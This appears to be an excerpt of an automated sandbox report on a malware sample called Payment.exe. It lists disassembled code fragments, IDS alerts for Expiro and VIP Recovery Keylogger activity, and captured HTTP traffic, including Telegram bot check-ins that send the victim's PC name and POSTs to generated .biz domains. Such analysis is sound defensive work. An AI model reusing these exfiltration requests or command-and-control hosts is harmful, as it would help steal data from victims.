                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A712Ch8_2_070A6E80
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A2154h8_2_070A1EA8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070ACD73h8_2_070ACAA0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AED9Bh8_2_070AEAC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A5184h8_2_070A4ED8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A7584h8_2_070A72D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070ADFD3h8_2_070ADD00
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A0FF4h8_2_070A0D48
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AA41Bh8_2_070AA148
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AC443h8_2_070AC170
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AE46Bh8_2_070AE198
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A144Ch8_2_070A11A0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AA8B3h8_2_070AA5E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A18A4h8_2_070A15F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A32B4h8_2_070A3008
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A62E4h8_2_070A6038
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A02ECh8_2_070A0040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070ABB13h8_2_070AB840
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070ADB3Bh8_2_070AD868
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A370Ch8_2_070A3460
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A0744h8_2_070A0498
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A673Ch8_2_070A6490
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AFB63h8_2_070AF890
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A3B64h8_2_070A38B8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A9F83h8_2_070A9CB0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070ABFABh8_2_070ABCD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A6B96h8_2_070A68E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A0B9Ch8_2_070A08F0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C6714h8_2_071C6418
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CE434h8_2_071CE138
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C4CF4h8_2_071C4980
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C53D4h8_2_071C50D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CB414h8_2_071CB118
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C9C04h8_2_071C9908
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CE904h8_2_071CE608
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C9734h8_2_071C9438
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C0C03h8_2_071C0930
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C22FBh8_2_071C2028
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C7F24h8_2_071C7C28
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CCC24h8_2_071CC928
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C39F3h8_2_071C3720
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C2C2Bh8_2_071C2958
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C7A54h8_2_071C7758
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CC754h8_2_071CC458
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C4323h8_2_071C4050
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C6244h8_2_071C5F48
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CAF44h8_2_071CAC48
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CFC44h8_2_071CF948
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C0313h8_2_071C0040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C5D74h8_2_071C5A78
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CAA74h8_2_071CA778
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CF774h8_2_071CF478
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C9264h8_2_071C8F68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CDF64h8_2_071CDC68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C1533h8_2_071C1260
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C8D94h8_2_071C8A98
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CDA94h8_2_071CD798
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C1E63h8_2_071C1B90
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C355Ch8_2_071C3288
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C7584h8_2_071C7288
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CC284h8_2_071CBF88
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C3E8Bh8_2_071C3BB8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C70B4h8_2_071C6DB8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CBDB4h8_2_071CBAB8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C58A4h8_2_071C55A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CA5A4h8_2_071CA2A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CF2A5h8_2_071CEFA8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C0783h8_2_071C04D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CA0D4h8_2_071C9DD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CEDD4h8_2_071CEAD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C109Bh8_2_071C0DC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C88C4h8_2_071C85C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CD5C4h8_2_071CD2C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C2793h8_2_071C24C0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C19CBh8_2_071C16F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C83F4h8_2_071C80F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CD0F4h8_2_071CCDF8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C30C3h8_2_071C2DF0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C47BBh8_2_071C44E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071C6BE4h8_2_071C68E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 071CB8E4h8_2_071CB5E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 07260CDCh8_2_072609E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0726033Ch8_2_07260040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0726080Ch8_2_07260510
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_0731FBB0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_0731FBA2
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 073332DEh8_2_07332EC0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 07332B94h8_2_073328E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733F5D4h8_2_0733F328
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733FA2Ch8_2_0733F780
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733E8CCh8_2_0733E620
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 073332DEh8_2_0733320C
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_07330273
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733ED24h8_2_0733EA78
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733F17Ch8_2_0733EED0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733DBC4h8_2_0733D918
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 07330F50h8_2_07330D70
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733193Bh8_2_07330D70
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733E01Ch8_2_0733DD70
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733E474h8_2_0733E1C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733CEBCh8_2_0733CC10
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733D314h8_2_0733D068
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0733D76Ch8_2_0733D4C0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_073C3168
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_073C3159
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]18_2_032B8F2A
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 08B9C7D7h18_2_08B9C221
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 08B9C7D7h18_2_08B9C261
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 037CFB20h39_2_037CFB6F
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 037CFB20h39_2_037CFBE1
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 037CFB20h39_2_037CF983
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BECCCh39_2_062BEA20
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062B32DEh39_2_062B320C
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BF124h39_2_062BEE78
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062B32DEh39_2_062B2EBA
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h39_2_062B0280
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062B32DEh39_2_062B2EC0
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BF57Ch39_2_062BF2D0
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BF9D4h39_2_062BF728
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BFE2Ch39_2_062BFB80
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BD2BCh39_2_062BD010
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BD714h39_2_062BD468
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062B2B94h39_2_062B28E0
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BDB6Ch39_2_062BD8C0
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BDFC4h39_2_062BDD18
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062B0F50h39_2_062B0D70
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062B193Bh39_2_062B0D70
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BE41Ch39_2_062BE170
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 4x nop then jmp 062BE874h39_2_062BE5C8

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:53810 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49691 -> 3.229.117.57:80
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49765 -> 54.169.144.97:80
                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:54423 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53205 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53023 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49722 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2860948 - Severity 1 - ETPRO MALWARE VIP Recovery Keylogger Checkin via Telegram (GET) : 192.168.2.8:49722 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49753 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2860948 - Severity 1 - ETPRO MALWARE VIP Recovery Keylogger Checkin via Telegram (GET) : 192.168.2.8:49753 -> 149.154.167.220:443
                  Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownNetwork traffic detected: DNS query count 52
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%20and%20Time:%2010/04/2025%20/%2023:15:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20PC-MLN150%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%20and%20Time:%2011/04/2025%20/%2009:21:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20PC-MLN150%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49689 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49710 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49745 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49729 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.8:49683
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.8:49683
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49698 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49702 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49747 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.8:49774
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.8:49774
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.142.91.111:80 -> 192.168.2.8:49769
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.8:49787
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.142.91.111:80 -> 192.168.2.8:49769
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.8:49787
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.8:49709
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49731 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.8:49709
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.8:49779
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.8:49779
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.8:49758
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.169.144.97:80 -> 192.168.2.8:49758
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.229.166.50:80 -> 192.168.2.8:49782
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.229.166.50:80 -> 192.168.2.8:49782
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.8:49691
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.8:49691
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49721 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49735 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49740 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.8:49776
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.8:49776
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.8:49821
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.8:49821
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49695 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49705 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49748 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49700 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49686 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49743 -> 104.21.64.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /uoiag HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /tmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /bxahccuchxrahyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
